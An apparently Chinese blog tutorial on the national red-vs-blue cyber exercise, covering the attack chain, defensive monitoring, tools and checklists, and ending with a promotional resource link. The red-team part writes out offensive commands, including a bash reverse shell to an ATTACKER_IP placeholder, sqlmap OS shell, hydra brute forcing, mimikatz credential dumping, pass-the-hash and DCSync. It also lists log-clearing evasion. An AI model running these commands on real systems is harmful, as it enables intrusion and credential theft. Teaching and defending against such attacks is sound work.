📌写在前面
“护网行动是什么?”“红队和蓝队分别做什么?”“怎么准备护网?”
护网行动(网络攻防演练)是国内规模最大的网络安全实战演习。红队模拟攻击者,从外网打点到内网渗透;蓝队模拟防御者,从监测告警到溯源处置。双方在真实环境中进行对抗。
护网行动是安全从业者的"高考"。每年护网期间,各大企业的安全团队都在通宵达旦地防守和反击。参加护网不仅能快速提升技术能力,更是职业发展的重要经历。
我第一次参加护网是作为红队成员,从外网一个边缘系统打入了内网,最终拿下了核心数据库。整个过程持续了两周,让我对"攻击链"有了完整理解。后来转为蓝队,又从防御角度理解了"检测覆盖"的重要性。
今天我把护网行动红蓝对抗的完整知识整理出来:行动概述、红队路径、蓝队体系、工具使用、攻防复盘。看完这篇,你对护网会有一个系统化认知。
⚠️ 注意:本文仅用于安全教育和防御目的。
一、护网行动概述
什么是护网行动
💡 护网行动是由国家相关部门组织的网络安全攻防演练,红队模拟攻击,蓝队负责防御,目的是检验和提升关键信息基础设施的安全防护能力。
红蓝双方对比
| 维度 | 红队(攻击方) | 蓝队(防守方) |
|---|---|---|
| 目标 | 获取靶标系统权限 | 防御攻击、溯源反制 |
| 范围 | 互联网暴露面 | 全量资产 |
| 时间 | 通常2-3周 | 全天候值守 |
| 策略 | 主动出击 | 被动防御+主动狩猎 |
| 成果 | 证明可被攻击 | 证明能防住 |
护网阶段
| 體段 | 时间 | 说明 |
|---|---|---|
| 准备期 | 演习前1-2月 | 资产梳理、加固整改 |
| 攻防期 | 2-3周 | 红蓝对抗 |
| 总结期 | 演习后 | 复盘、报告、整改 |
二、红队攻击路径
红队攻击链
1. 信息收集 → 2. 外网打点 → 3. 获取初始权限 → 4. 内网渗透 → 5. 横向移动 → 6. 获取靶标 → 7. 权限维持 → 8. 溯源反制规避1. 信息收集
# 资产收集# 子域名subfinder-dtarget.com-osubs.txt amass enum-dtarget.com# 端口扫描nmap-sV-p- --min-rate1000target.com masscan -p1-655351.2.3.0/24--rate=10000# Web指纹whatweb http://target.com wappalyzer-cli http://target.com# 目录扫描dirsearch-uhttp://target.com-ephp,asp,jsp,html gobusterdir-uhttp://target.com-wwordlist.txt# 人员信息# LinkedIn、GitHub、企业官网2. 外网打点
| 打点方式 | 说明 | 成功率 |
|---|---|---|
| Web漏洞 | SQL注入/RCE/上传 | 高 |
| 弱口令 | VPN/SSH/RDP/管理后台 | 中 |
| 钓鱼邮件 | 钓鱼+木马 | 中 |
| 供应链 | 第三方系统/供应商 | 中 |
| API漏洞 | 未授权/注入 | 高 |
| 配置不当 | 信息泄露/默认配置 | 高 |
3. 获取初始权限
# 通过Web漏洞获取Shell# SQL注入写文件sqlmap-u"http://target.com/news?id=1"--os-shell# 文件上传# 上传一句话木马 → 蚁剑连接# RCE漏洞# 命令注入 → 反弹Shellbash-i>&/dev/tcp/ATTACKER_IP/44440>&1# 弱口令# VPN/SSH/RDP弱口令hydra-ladmin-Ppasswords.txt ssh://target.com4. 内网渗透
# 信息收集ipconfig /all# 网络配置net user /domain# 域用户net group"domain admins"/domain# 域管systeminfo# 系统信息# 代理穿透# 使用frp/ew搭建SOCKS代理# 配置proxychains# 域信息收集# BloodHound + SharpHoundSharpHound.exe-cAll# 分析攻击路径5. 横向移动
# 凭据获取mimikatz.exe privilege::debug sekurlsa::logonpasswords# 横向移动# Impacketpsexec.py corp/admin:password@10.0.0.5 wmiexec.py corp/admin:password@10.0.0.5# 哈希传递crackmapexec smb10.0.0.0/24-uadmin-HNT_HASH# 域攻击# KerberoastingGetUserSPNs.py corp/user:pass -dc-ip10.0.0.1-request# DCSyncsecretsdump.py corp/admin:password@10.0.0.16. 获取靶标
# 靶标通常是:# - 核心数据库# - 域控# - 关键业务系统# - 核心生产网# 获取靶标权限后# 截图证明 + 留标记(按规定操作)红队规避技术
| 规避措施 | 说明 |
|---|---|
| 流量加密 | HTTPS/ICMP隧道 |
| 进程注入 | 避免落地文件 |
| 白加黑 | 利用合法程序加载 |
| 日志清理 | 清除操作痕迹 |
| 时间规避 | 在流量低谷操作 |
| 工具混淆 | 修改特征/使用C# |
| Living Off the Land | 使用系统自带工具 |
三、蓝队防御体系
蓝队防御层次
┌─────────────────────────────────┐ │ 威胁情报订阅 │ ├─────────────────────────────────┤ │ 流量检测(NDR/IDS/IPS) │ ├─────────────────────────────────┤ │ 终端检测(EDR/HIDS) │ ├─────────────────────────────────┤ │ 日志分析(SIEM/SOC) │ ├─────────────────────────────────┤ │ 资产管理(CMDB/攻击面) │ └─────────────────────────────────┘1. 资产梳理
| 工作内容 | 说明 |
|---|---|
| 资产盘点 | 摸清所有IT资产 |
| 暴露面收敛 | 关闭不必要的外网服务 |
| 弱口令整改 | 修改默认/弱口令 |
| 补丁更新 | 修复已知漏洞 |
| 配置加固 | 安全基线检查 |
| 权限收敛 | 最小权限原则 |
2. 流量监测
# 全流量分析# 部署全流量探针/NDR# 监控维度:# - 出站连接(反弹Shell检测)# - 异常协议(DNS隧道/ICMP隧道)# - 大流量传输(数据外泄)# - 横向扫描(内网端口扫描)# - 已知攻击特征(SQL注入/XSS等)# 常用工具# Suricata / Snort / Zeek# Wireshark(取证分析)3. 终端防护
| 防护措施 | 工具 |
|---|---|
| EDR部署 | Crowdstrike/SentinelOne/微步/奇安信 |
| 进程监控 | Sysmon |
| 文件监控 | 文件完整性监控(FIM) |
| 行为分析 | 异常进程/网络行为 |
| 微隔离 | 限制横向移动 |
Sysmon配置
<!-- Sysmon配置示例 --><Sysmonschemaversion="4.82"><HashAlgorithms>SHA256</HashAlgorithms><!-- 进程创建 --><RuleGroupname="Process Creation"groupRelation="or"><ProcessCreateonmatch="include"><!-- 监控PowerShell执行 --><Imagecondition="contains">powershell.exe</Image><!-- 监控CMD执行 --><Imagecondition="contains">cmd.exe</Image><!-- 监控可疑工具 --><Imagecondition="contains">mimikatz</Image><Imagecondition="contains">procdump</Image></ProcessCreate></RuleGroup><!-- 网络连接 --><RuleGroupname="Network Connections"groupRelation="or"><NetworkConnectonmatch="include"><!-- 非标准端口连接 --><DestinationPortcondition="not in">80,443,53,22,25,123</DestinationPort></NetworkConnect></RuleGroup><!-- 文件创建 --><RuleGroupname="File Creation"groupRelation="or"><FileCreateonmatch="include"><!-- 监控可执行文件创建 --><TargetFilenamecondition="contains">.exe</TargetFilename><TargetFilenamecondition="contains">.dll</TargetFilename><TargetFilenamecondition="contains">.ps1</TargetFilename></FileCreate></RuleGroup></Sysmon>4. SIEM日志分析
# 常见SIEM平台# Splunk / ELK / QRadar / 奇安信态势感知# 关键监控规则# 1. 多次认证失败(密码爆破)# 2. 异常时间登录# 3. 新进程创建# 4. PowerShell编码执行# 5. 横向移动行为# 6. 数据大流量外传# 7. DNS异常查询# 8. Mimikatz行为特征5. 告警处置流程
告警产生 → 值班人员初判 → 安全分析师研判 → 确认攻击 → 应急响应 → 处置闭环| 处置级别 | 响应时间 | 处置方式 |
|---|---|---|
| 严重 | 15分钟 | 立即隔离+处置 |
| 高危 | 30分钟 | 调查+可能隔离 |
| 中危 | 2小时 | 调查分析 |
| 低危 | 4小时 | 记录监控 |
四、蓝队溯源反制
溯源目标
确定攻击者IP → 关联攻击者身份 → 评估攻击范围 → 提交裁判组 → 获取加分溯源方法
| 方法 | 说明 |
|---|---|
| IP溯源 | 查IP归属、ASN、历史记录 |
| 钓鱼反制 | 分析钓鱼邮件中的线索 |
| 样本分析 | 分析木马样本中的C2地址 |
| 蜜罐诱捕 | 部署蜜罐捕获攻击者信息 |
| 社交工程 | 利用攻击者留下的信息反查 |
| 威胁情报 | 关联已知攻击组织 |
蜜罐部署
# HFish蜜罐dockerrun-d-p22:22-p80:80-p443:443\-p3306:3306-p6379:6379\--namehfish hfish/hfish:latest# 封易蜜罐# 部署在攻击者可能扫描的位置# 等待攻击者交互# 记录攻击者IP、手法、工具信息五、护网常用工具
红队工具
| 工具 | 功能 | 说明 |
|---|---|---|
| Cobalt Strike | 红队平台 | 团队协作、Beacon |
| Metasploit | 漏洞利用 | Exploit框架 |
| Burp Suite | Web渗透 | 抓包改包 |
| sqlmap | SQL注入 | 自动化注入 |
| Nmap | 端口扫描 | 网络发现 |
| BloodHound | 域分析 | 攻击路径 |
| Mimikatz | 凭据获取 | 密码哈希 |
| frp | 代理穿透 | 内网穿透 |
| fscan | 综合扫描 | 内网一键扫描 |
蓝队工具
| 工具 | 功能 | 说明 |
|---|---|---|
| Splunk/ELK | SIEM | 日志分析 |
| Suricata | IDS/IPS | 流量检测 |
| Sysmon | 终端监控 | 行为记录 |
| Wireshark | 流量分析 | 取证分析 |
| Falco | 容器监控 | 运行时安全 |
| HFish | 蜜罐 | 诱捕攻击者 |
| 微步在线 | 威胁情报 | IP/域名查询 |
| 奇安信 | 态势感知 | 综合防护 |
六、护网备战Checklist
红队备战
| 检查项 | 是否完成 |
|---|---|
| 目标信息收集完成 | ☐ |
| 攻击工具准备就绪 | ☐ |
| 基础设施搭建(C2/代理) | ☐ |
| Payload免杀处理 | ☐ |
| 攻击路径规划 | ☐ |
| 规则学习(裁判规则) | ☐ |
| 团队分工明确 | ☐ |
| 应急预案(被发现时) | ☐ |
蓝队备战
| 检查项 | 是否完成 |
|---|---|
| 资产全面梳理 | ☐ |
| 外网暴露面收敛 | ☐ |
| 弱口令全面整改 | ☐ |
| 补丁更新完成 | ☐ |
| 安全设备部署就位 | ☐ |
| 监控规则调优 | ☐ |
| 值班排班确定 | ☐ |
| 应急响应预案 | ☐ |
| 蜜罐部署 | ☐ |
| 溯源工具准备 | ☐ |
七、护网复盘
红队复盘要点
| 维度 | 分析内容 |
|---|---|
| 攻击路径 | 成功/失败的路径分析 |
| 打点方式 | 哪种方式最有效 |
| 检测覆盖 | 哪些操作被蓝队发现 |
| 规避效果 | 哪些规避技术有效 |
| 教训总结 | 下次改进方向 |
蓝队复盘要点
| 维度 | 分析内容 |
|---|---|
| 发现能力 | 哪些攻击被及时发现 |
| 漏检分析 | 哪些攻击未被发现 |
| 响应速度 | 平均响应时间 |
| 处置效果 | 处置是否及时有效 |
| 溯源成果 | 溯源成功率 |
| 改进方向 | 检测覆盖提升计划 |
学习资源
护网行动是网络安全行业最实战化的对抗演习。参加护网不仅能快速提升技术水平,更能获得宝贵的实战经验。无论是红队的攻击链路还是蓝队的防御体系,都需要在实战中不断磨炼。
从红队的打点渗透到蓝队的监测溯源,从攻击规避到检测覆盖,护网中的每一项技术都需要深入理解和大量练习。
如果你对红蓝对抗和护网行动感兴趣,想系统学习更多知识——包括渗透测试、内网渗透、应急响应、CTF实战等——可以参考下面整理的完整学习资料包。
内容涵盖:
护网行动红蓝对抗专题
渗透测试全流程实战
内网渗透技术指南
应急响应实战手册
流量分析与入侵检测
CTF比赛专项训练
Python安全编程实战
从零基础到实战进阶,200+节视频课程,配套工具和靶场环境,涵盖攻防对抗全生命周期。
🐵这些东西我都可以免费分享给大家,需要的可以点这里自取👉:网安入门到进阶资源
总结
| 角色 | 核心能力 |
|---|---|
| 红队 | 打点 + 内网 + 横向 + 靶标 |
| 蓝队 | 监测 + 分析 + 处置 + 溯源 |
| 红队关键 | 信息收集 + 打点效率 + 规避能力 |
| 蓝队关键 | 检测覆盖 + 响应速度 + 溯源能力 |
🔒 护网的核心是"以攻促防"。每一次攻击发现,都是防御提升的机会。
————————————————